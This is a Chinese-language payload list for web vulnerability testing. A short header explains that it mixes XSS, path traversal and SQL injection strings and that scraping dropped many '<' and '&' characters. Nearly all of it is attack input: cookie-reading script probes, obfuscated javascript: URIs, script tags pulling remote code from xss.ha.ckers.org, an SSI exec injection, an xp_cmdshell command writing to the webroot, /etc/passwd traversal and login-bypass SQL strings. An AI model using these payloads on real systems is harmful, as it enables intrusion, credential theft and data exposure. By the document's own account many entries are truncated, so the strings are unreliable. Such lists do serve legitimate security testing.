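XSS测试语句大全
说明:本列表除XSS语句外,还混有目录遍历(etc/passwd、win.ini、system.ini)和SQL注入(or 1=1、union select、xp_cmdshell)的测试串,判定结果时应按漏洞类型分别对待。页面抓取时部分"<"和"&"字符已丢失,下列语句并非原文的完整形式。其中不少向量(如 DYNSRC、LOWSRC、BGSOUND、LAYER、expression()、mocha:、livescript:)只对旧版浏览器有效,在现代浏览器中不触发并不代表输出编码已经正确,仍需直接检查响应中的特殊字符是否被转义。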
'>script>alert(document.cookie)/script>
='>script>alert(document.cookie)/script>
script>alert(document.cookie)/script>
script>alert(vulnerable)/script>
%3Cscript%3Ealert('XSS')%3C/script%3E
s#99;ript>alert('XSS')/script>
img src="javas#99;ript:alert('XSS')">
%0a%0ascript>alert(\"Vulnerable\")/script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
lt;scriptgt;alert('Vulnerable');lt;/scriptgt
script>alert('Vulnerable')/script>
?sql_debug=1
a%5c.aspx
a.jsp/script>alert('Vulnerable')/script>
a/
a?script>alert('Vulnerable')/script>
">script>alert('Vulnerable')/script>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E
%3Cscript%3Ealert(document.domain);%3C/script%3ESESSION_ID={SESSION_ID}SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"XSS>={()}
IMG SRC="javascript:alert('XSS');">
IMG SRC=javascript:alert('XSS')>
IMG SRC=JaVaScRiPt:alert('XSS')>
IMG SRC=JaVaScRiPt:alert(quot;XSSquot;)>
IMG SRC=#106;#97;#118;#97;#115;#99;#114;#105;#112;#116;#58;#97;#108;#101;#114;#116;#40;#39;#88;#83;#83;#39;#41>
IMG SRC=#0000106#0000097#0000118#0000097#0000115#0000099#0000114#0000105#0000112#0000116#0000058#0000097#0000108#0000101#0000114#0000116#0000040#0000039#0000088#0000083#0000083#0000039#0000041>
IMG SRC=#x6A#x61#x76#x61#x73#x63#x72#x69#x70#x74#x3A#x61#x6C#x65#x72#x74#x28#x27#x58#x53#x53#x27#x29>
IMG SRC="jav#x09;ascript:alert('XSS');">
IMG SRC="jav#x0A;ascript:alert('XSS');">
IMG SRC="jav#x0D;ascript:alert('XSS');">
"IMG SRC=java\0script:alert(\"XSS\")>";' > out
IMG SRC=" javascript:alert('XSS');">
SCRIPT>a=/XSS/alert(a.source)/SCRIPT>
BODY BACKGROUND="javascript:alert('XSS')">
BODY ONLOAD=alert('XSS')>
IMG DYNSRC="javascript:alert('XSS')">
IMG LOWSRC="javascript:alert('XSS')">
BGSOUND SRC="javascript:alert('XSS');">
br size="{alert('XSS')}">
LAYER SRC="http://xss.ha.ckers.org/a.js">/layer>
LINK REL="stylesheet" HREF="javascript:alert('XSS');">
IMG SRC='vbscript:msgbox("XSS")'>
IMG SRC="mocha:[code]">
IMG SRC="livescript:[code]">
META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
IFRAME SRC=javascript:alert('XSS')>/IFRAME>
FRAMESET>FRAME SRC=javascript:alert('XSS')>/FRAME>/FRAMESET>
TABLE BACKGROUND="javascript:alert('XSS')">
DIV STYLE="background-image: url(javascript:alert('XSS'))">
DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html#39;);">
DIV STYLE="width: expression(alert('XSS'));">
STYLE>@im\port'\ja\vasc\ript:alert("XSS")';/STYLE>
IMG STYLE='xss:expre\ssion(alert("XSS"))'>
STYLE TYPE="text/javascript">alert('XSS');/STYLE>
STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}/STYLE>A CLASS=XSS>/A>
STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}/STYLE>
BASE HREF="javascript:alert('XSS');//">
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
XML SRC="javascript:alert('XSS');">
"> BODY ONLOAD="a();">SCRIPT>function a(){alert('XSS');}/SCRIPT>"
SCRIPT SRC="http://xss.ha.ckers.org/xss.jpg">/SCRIPT>
IMG SRC="javascript:alert('XSS')"
!--#exec cmd="/bin/echo 'SCRIPT SRC'"-->!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js>/SCRIPT>'"-->
IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js">/SCRIPT>
SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js">/SCRIPT>
SCRIPT a=">" '' SRC="http://xss.ha.ckers.org/a.js">/SCRIPT>
SCRIPT "a='>'" SRC="http://xss.ha.ckers.org/a.js">/SCRIPT>
SCRIPT>document.write("SCRI");/SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js">/SCRIPT>
A HREF=http://www.gohttp://www.google.com/ogle.com/>link/A>
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a